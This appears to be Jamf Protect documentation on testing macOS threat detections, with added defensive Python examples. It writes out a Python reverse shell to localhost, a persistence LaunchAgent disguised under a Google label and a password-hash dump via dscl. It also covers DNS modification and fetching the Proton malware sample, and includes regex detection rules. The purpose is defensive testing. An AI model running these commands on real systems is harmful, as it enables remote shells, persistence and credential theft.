Threat Detection Tests

Once the Jamf Protect agent is installed on computers, you can test threat detections with the following series of threat simulations. Each simulation targets a built-in Analytic.

Disclaimer:

Some of the tests in this guide require downloading known malware. Please ensure proper precautions are taken when conducting any of the tests. We recommend testing in a controlled environment, segregated from any production or critical infrastructure, and on computers approved for or dedicated to testing malicious software. Jamf does not accept any responsibility or liability for any loss, damage, cost, or expense you might incur as a result of the use of, or reliance upon, the materials which appear in this document or any linked website.

Command and Control (Remote Access) Tools

A command and control (remote access) attack via a reverse shell is a common technique that establishes a connection from a target computer back to an attacker's computer. The attacker's computer acts as a server and listens on a specified port for an incoming connection from the target computer. Attackers often use Python to quickly create a reverse shell.

To test Jamf Protect's built-in analytic that monitors for this behavior, do the following:

  1. In Terminal, start a netcat listener on localhost port 8080 by executing the following command:
    nc -l 8080
  2. In a separate Terminal window, create a Python reverse shell that connects back to localhost on port 8080 by executing the following command on a single line:
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

    In the netcat window, a reverse shell prompt should now appear, allowing you to enter commands from the netcat listener.

  3. Close the netcat window by entering exit.
  4. In Jamf Protect, click Alerts.

A PythonReverseShell entry should appear.

Defense Evasion and Masquerading

Attackers may disguise malware as a legitimate persistent service, for example by installing it with a fake LaunchAgent PLIST file.

To test Jamf Protect's built-in analytic that monitors for this behavior, do the following:

  1. Copy a binary to the temporary folder by executing the following command:
    cp /usr/bin/whoami /tmp/test
  2. Create a persistence file for the binary by executing the following command:
    cat >~/Library/LaunchAgents/com.google.analytictest.plist <<EOL
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
        <key>Label</key>
        <string>com.google.test</string>
        <key>ProgramArguments</key>
        <array>
            <string>/tmp/test</string>
        </array>
        <key>RunAtLoad</key>
        <true/>
    </dict>
    </plist>
    EOL
    Note:

    The closing EOL must begin at the start of its own line with no leading whitespace; otherwise the shell keeps waiting for more input.

  3. In Jamf Protect, click Alerts.

A PlistDisguisedAsGoogle entry (a LaunchAgent alert) should appear.

Delete the files created in steps 1 and 2 by executing the following commands:
rm /tmp/test
rm ~/Library/LaunchAgents/com.google.analytictest.plist
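
As an added example (not part of the Jamf Protect documentation or product), the following Python script shows the kind of check a defender can run over ~/Library/LaunchAgents to spot the pattern this test creates: a plist whose Label borrows a trusted vendor namespace while its program runs from a world-writable directory, or whose file name does not match its Label. The vendor prefixes and directory list are assumptions, and the sample plists are constructed inline.

```python
import glob
import os
import plistlib

# Assumed lists: vendor namespaces commonly impersonated, and directories a
# legitimately installed agent would not normally execute from.
TRUSTED_PREFIXES = ("com.apple.", "com.google.", "com.microsoft.", "com.adobe.")
UNTRUSTED_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/",
                  "/Users/Shared/")

def program_of(agent: dict) -> str:
    """Return the executable launchd will run: Program wins over ProgramArguments."""
    if agent.get("Program"):
        return str(agent["Program"])
    args = agent.get("ProgramArguments") or []
    return str(args[0]) if args else ""

def audit_agent(plist_bytes: bytes, filename: str) -> list[str]:
    """Return findings for one LaunchAgent plist, given its bytes and file name."""
    agent = plistlib.loads(plist_bytes)
    label = str(agent.get("Label", ""))
    program = program_of(agent)
    findings = []
    if program.startswith(UNTRUSTED_DIRS):
        findings.append(f"{filename}: runs {program} from a world-writable directory")
        if label.startswith(TRUSTED_PREFIXES):
            findings.append(f"{filename}: Label {label} borrows a trusted vendor namespace")
    if os.path.basename(filename).removesuffix(".plist") != label:
        findings.append(f"{filename}: file name does not match Label {label}")
    return findings

def audit_directory(directory: str) -> list[str]:
    """Audit every .plist in a LaunchAgents folder such as ~/Library/LaunchAgents."""
    findings = []
    pattern = os.path.join(os.path.expanduser(directory), "*.plist")
    for path in sorted(glob.glob(pattern)):
        with open(path, "rb") as fh:
            findings.extend(audit_agent(fh.read(), path))
    return findings

# Constructed samples: the agent this test creates, and a benign agent for contrast.
SUSPICIOUS = plistlib.dumps({"Label": "com.google.test",
                             "ProgramArguments": ["/tmp/test"], "RunAtLoad": True})
BENIGN = plistlib.dumps({"Label": "com.example.updater", "RunAtLoad": True,
                         "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater"]})

if __name__ == "__main__":
    print(*audit_agent(SUSPICIOUS, "com.google.analytictest.plist"), sep="\n")
    print(*audit_directory("~/Library/LaunchAgents"), sep="\n")
```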

Credential Access and Dumping

Credential Dumping (also known as "pass-the-hash" or "hash dumping") is a technique used to obtain the hash of a username or password and use it to gain account access.

To test Jamf Protect's built-in Analytic that monitors for this behavior, do the following:

  1. Execute the following command:
    sudo dscl . read /Users/$USER dsAttrTypeNative:ShadowHashData | xxd -p -r | plutil -convert xml1 - -o -
  2. In Jamf Protect, click Alerts.
A Hashdump entry should appear.

Built-In Apple Security Services

Apple's built-in anti-virus application, XProtect, scans a binary before it is launched and blocks identified malware. End users are alerted via a pop-up window, but Jamf Protect also logs XProtect activity for additional visibility.

To test Jamf Protect's built-in analytic that monitors for this behavior, do the following:

Warning:

This test requires downloading known malware. Make sure you are using a virtual machine to detonate the malware used in this test.

  1. On your virtual machine, download Proton from the Objective-See Mac Malware website.
  2. Open the downloaded file. When prompted, enter the following password: infect3d
  3. Open the following folder: Proton/Proton.B
  4. Open handbrake.dmg
    Note:

    Handbrake is a safe application that was once infected by a supply chain attack. This sample is a modified version.

  5. On the virtual machine, confirm that a pop-up window appears that prompts you to eject the DMG.
  6. In Jamf Protect, click Alerts.
One of the following should display:
  • On macOS 10.14 or earlier, an XProtect entry.
  • On macOS 10.15, a GatekeeperBlocked entry.

DNS Redirection and Man in the Middle (MITM) Attacks

Domain Name Service (DNS) redirection (also known as DNS hijacking) is a type of MITM technique in which attackers insert themselves into the DNS lookup process by changing a user's DNS server settings. Once the settings are changed, attackers can manipulate website traffic, for example by making a website appear offline or by redirecting traffic to a malicious website instead.

To test Jamf Protect's built-in Analytic that monitors for this behavior, do the following:

  1. In Terminal, execute the following command:
    networksetup -setdnsservers Wi-Fi 8.8.8.8
  2. In Jamf Protect, click Alerts.

A DnsModification entry should appear.

Undo the DNS server change made in step 1 by executing the following command:
networksetup -setdnsservers Wi-Fi "Empty"
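
As an added example (not Jamf Protect's own analytic logic), the following Python snippet applies simple command-line rules modelled on the PythonReverseShell, Hashdump and DnsModification tests in this guide to a constructed set of process-execution events, so you can see which of the commands above would be expected to alert and which ordinary commands would not. The regexes and the event format are assumptions.

```python
import re

# Assumed regex heuristics in the spirit of the three analytics exercised in this
# guide; they are not Jamf Protect's own detection logic.
RULES = {
    "PythonReverseShell": re.compile(
        r"\bpython[\d.]*\s+.*-c\s+.*socket\.socket\(.*\.connect\(.*os\.dup2\("),
    "Hashdump": re.compile(r"\bdscl\b.*\bShadowHashData\b"),
    "DnsModification": re.compile(r"\bnetworksetup\b.*-setdnsservers\b"),
}

def match_rules(cmdline: str) -> list[str]:
    """Return the names of every rule whose pattern matches one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def scan_events(events: list[dict]) -> list[dict]:
    """Turn process-execution events into alert records, one per matching rule."""
    alerts = []
    for ev in events:
        for name in match_rules(ev["cmdline"]):
            alerts.append({"analytic": name, "pid": ev["pid"],
                           "user": ev["user"], "cmdline": ev["cmdline"]})
    return alerts

# Constructed sample telemetry (not real Jamf Protect output): the commands run by
# the tests in this guide, interleaved with ordinary activity that must not alert.
EVENTS = [
    {"pid": 501, "user": "tester", "cmdline": "nc -l 8080"},
    {"pid": 502, "user": "tester", "cmdline":
        "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,"
        "socket.SOCK_STREAM);s.connect((\"127.0.0.1\",8080));os.dup2(s.fileno(),0);"
        " os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"},
    {"pid": 503, "user": "tester", "cmdline":
        "python3 -c 'import json,sys; print(json.load(sys.stdin))'"},
    {"pid": 504, "user": "root", "cmdline":
        "dscl . read /Users/tester dsAttrTypeNative:ShadowHashData | xxd -p -r "
        "| plutil -convert xml1 - -o -"},
    {"pid": 505, "user": "tester", "cmdline": "dscl . read /Users/tester RealName"},
    {"pid": 506, "user": "tester", "cmdline": "networksetup -getdnsservers Wi-Fi"},
    {"pid": 507, "user": "root", "cmdline": "networksetup -setdnsservers Wi-Fi 8.8.8.8"},
]

if __name__ == "__main__":
    for alert in scan_events(EVENTS):
        print(f"{alert['analytic']:<20} pid={alert['pid']} user={alert['user']}")
```

Note that the cleanup command networksetup -setdnsservers Wi-Fi "Empty" matches the same rule, which is expected: the analytic is about the settings being changed, not about the value chosen.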